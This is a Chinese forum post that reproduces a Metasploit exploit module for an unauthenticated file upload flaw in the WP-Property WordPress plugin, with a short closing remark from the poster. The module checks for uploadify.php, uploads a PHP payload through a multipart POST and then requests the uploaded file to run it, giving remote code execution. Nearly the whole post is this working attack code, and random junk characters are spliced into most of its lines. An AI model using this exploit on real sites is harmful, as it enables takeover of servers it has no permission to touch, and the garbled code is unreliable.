WordPress WP-Property PHP 文件上传漏洞
. M3 S* n8 z& n) }7 K9 z7 g4 P$ u& {! s& y8 p9 k7 c
## # This file is part of the Metasploit Framework and may be subject to
( {9 H8 h. Q* f" n
# H4 g: f$ y/ ]- I3 P# @2 b0 P5 V- A# redistribution and commercial restrictions. Please see the Metasploit
* E k7 b6 `3 Q `; r4 U, M+ {0 c! J) F2 t; \4 D* i" L* T
# Framework web site for more information on licensing and terms of use.
. F, I5 g; w6 D& x9 ~; S3 w* A5 o2 c% |6 w: Q0 Q
# http://metasploit.com/framework/ ##
" C, h' {/ P1 o' G/ u z- P/ \7 Z9 @
/ o. C# _) _ s; n7 _0 y' B/ @0 B3 t% P, P' f, u+ g+ F
3 V* s% M [( m" g, y$ d0 s, `' D( p( B4 A) t: [$ {
require 'msf/core'
; R# @' L4 n9 L& y: arequire 'msf/core/exploit/php_exe'9 d" P2 q E' T* o2 Z
1 F4 k- ~) ]/ p8 R- ^1 g, Xclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',6 }; e- c( ]/ _: S4 m2 s* r
'Description' => %q{! Z& y1 P+ [ p d- S0 {
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>- g0 ?6 a) f9 D3 y2 c5 o) l1 f+ ~
[
/ n+ R; y; ~2 g, T'Sammy FORGIT', # initial discovery
( u5 ~* G+ W0 z2 o& s$ g0 P! q'James Fitts <fitts.james[at]gmail.com>' # metasploit module
3 e) s9 C( J1 R( m& i& h# S],
4 ]; k0 r1 S! \9 C& m: Q+ x9 l7 D'License' => MSF_LICENSE,( X1 q* e# D; p. T% y0 T
'References' =>3 [# r( E, K. e1 ^9 P
[, l( n( ~$ T' i/ [4 z7 |7 U4 r
[ 'OSVDB', '82656' ],
" N" W( C1 \, x1 B! K[ 'BID', '53787' ],- M, s- X* n6 v' S
[ 'EDB', '18987'],, V w: T3 c5 I _0 T. C `& `
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
. |; W0 k5 n& V' d],9 ?: Z' [, Z, x6 U. f0 A J6 n+ _) J
'Payload' =>. G) z! ]4 ?- f+ t+ N# P5 L
{. \( D" l; {# z* S% Y1 b0 @; K* o
'BadChars' => "\x00",
' h9 V. c7 ~' I, ^. ^$ X- }) G2 L},
" X9 ?0 @" T/ i' _ E'Platform' => 'php',( y. G/ b0 d* y
'Arch' => ARCH_PHP,( J! b x0 I0 T/ P/ v S
'Targets' =>+ r) ?' K2 l1 Z$ ?! Z
[
# m1 {1 s! J" K) E[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
) \' g* E, y, D- @, q[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]" }" n7 K7 y+ j% f, i
],
y: C1 v7 z! \+ J'DefaultTarget' => 0,
9 L3 ?2 [, f+ d9 B8 y+ E# j7 o# S% X) O'DisclosureDate' => 'Mar 26 2012'))
+ E. G* E& u, o L9 l% B' {: {
8 N6 P! }% U7 @! D3 m! rregister_options(
$ f/ j& y0 D7 ]* }[
8 X2 _3 G z4 R3 ~' TOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])) i8 w+ G% `$ f$ L
], self.class)
S+ ~8 m- D& _- _2 g5 R9 Vend
3 A1 D' _& R$ K. P8 k# H
) q% K8 l/ N; D5 G. h) zdef check. r9 x! ^) K7 }9 u: ^4 h7 W
uri = target_uri.path1 n' Z: N! V7 A4 `( O1 I" Y
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
) {$ B: x/ u; v' n3 u'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
* [6 v4 O# @$ L3 u% E& _})* p& s! S- h# R+ z# d, p
: B; o0 o6 ?3 G2 O& v
if not res or res.code != 200+ O* g- |3 p. d% h( D0 k
return Exploit::CheckCode::Unknown
# V5 l2 y0 R0 \ ^5 h1 tend6 U+ w& [+ i$ ?7 b
5 f% ~3 P8 r! V& ?# N( R
return Exploit::CheckCode::Appears8 {8 j8 S; U7 {9 s, M$ @ Q
end* m; S! R I( u9 Z3 f7 Y0 l+ A. R0 A
S- ]6 x4 p7 s. \* R, I3 vdef exploit9 k1 z/ }9 J! h
uri = target_uri.path
; u/ v, z. v) H Curi << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
. d- I G O5 W8 X' j8 L" h) Q @
5 K% l+ ?( y- E! g3 E8 B8 kdata = Rex::MIME::Message.new, a- K/ ^/ p' t# R$ h1 c
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
. I4 p3 R& g) [5 }3 j. [) Edata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
! m e6 H% C, l, P) m4 t# Y Tpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
; p; j9 F# w/ u2 |
" E8 c8 ]4 }- k3 l# y) Uprint_status("#{peer} - Uploading payload #{@payload_name}")
$ K; d1 q7 i/ E6 @res = send_request_cgi({* @7 I' l& S" f/ C: v! l
'method' => 'POST',
) W0 q, Z4 q( Z+ _) i; D'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",' @2 Y! v& n8 U- S
'ctype' => "multipart/form-data; boundary=#{data.bound}",
1 X2 A0 Q5 C. \& W5 D7 w% ~'data' => post_data
# C" Q. M+ N3 U5 [})/ @# |% E$ j' i+ n6 n
B5 r8 x: c( Y! ~, P
if not res or res.code != 200 or res.body !~ /#{@payload_name}/; [1 U9 j7 f3 R- R
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
% c. U, \; L# Uend
6 I+ z: L# v4 P% ~+ j+ I6 }* ?9 E& r" w' }6 k
upload_uri = res.body
4 v: L5 W; b7 M% h9 D, Y+ C( e% }# }8 r- |7 f/ w5 m. J+ h
print_status("#{peer} - Executing payload #{@payload_name}")* J& k1 d9 Q% y0 ^
res = send_request_raw({, \# p: j1 Q/ m6 I& H7 ~& @
'uri' => upload_uri,
: C* L s) a) f'method' => 'GET'7 C. r. D1 c) V! f7 ]
})" k4 G3 Z& ^9 ~1 `2 U' ^7 ?* J( h
end" G6 n. M0 s) Z' a$ b t
end# B9 }$ m& W, F, g
$ M8 |0 {; w# @; O, L( M. l
不要问我这写的是什么 怎么利用 我是说msf.
5 [3 m* s5 U: l1 b1 v' p/ H9 @3 ~- {' F/ q
|
发表于 2013-1-4 19:51:30
收藏
支持
反对